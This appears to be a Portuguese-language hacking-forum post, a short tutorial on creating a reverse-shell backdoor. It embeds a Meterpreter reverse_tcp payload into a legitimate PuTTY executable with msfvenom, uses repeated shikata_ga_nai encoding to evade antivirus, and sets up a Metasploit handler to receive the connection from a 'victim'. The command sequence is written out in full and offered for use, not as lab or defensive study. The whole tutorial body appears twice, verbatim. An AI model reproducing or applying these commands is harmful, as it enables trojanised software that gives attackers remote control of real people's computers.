Bom fala ai pessoal vou fazer esse mini tutorial,como criar backdoor de conexão reversa com o msfvenom vou postar uma imagem só ,por que meu metasploit na VM não quer abrir rsrs
Bom vamos lá suponhamos que o seu Ip seja esse:
192.168.0.8
e o IP da vítima seja esse:
: 192.168.0.x lembrando que dentro da rede LAN pode ser qualquer IP .
Abra o terminal e baixe usando o wget.
wget [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Eu estava no diretório raiz quando eu usei acima de comando. Então,putty foi baixado no diretório root
Agora use msfvenom para backdoor ser executável usando o seguinte comando.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.8
LPORT=4444 > sax.exe
Comando acima irá gerar um arquivo EXE com o nome sax.exe. Este é o nosso arquivo executável.
Abra o Metasploit ou digite msfconsole pelo kali linux ou backtrack no terminal.
Fazendo a conexão reversa com o Metasploit.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.8
set LPORT 4444
exploit
Bom vamos lá suponhamos que o seu Ip seja esse:
192.168.0.8
e o IP da vítima seja esse:
: 192.168.0.x lembrando que dentro da rede LAN pode ser qualquer IP .
Abra o terminal e baixe usando o wget.
wget [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Eu estava no diretório raiz quando eu usei acima de comando. Então,putty foi baixado no diretório root
Agora use msfvenom para backdoor ser executável usando o seguinte comando.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.8
LPORT=4444 > sax.exe
Comando acima irá gerar um arquivo EXE com o nome sax.exe. Este é o nosso arquivo executável.
Abra o Metasploit ou digite msfconsole pelo kali linux ou backtrack no terminal.
Fazendo a conexão reversa com o Metasploit.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.8
set LPORT 4444
exploit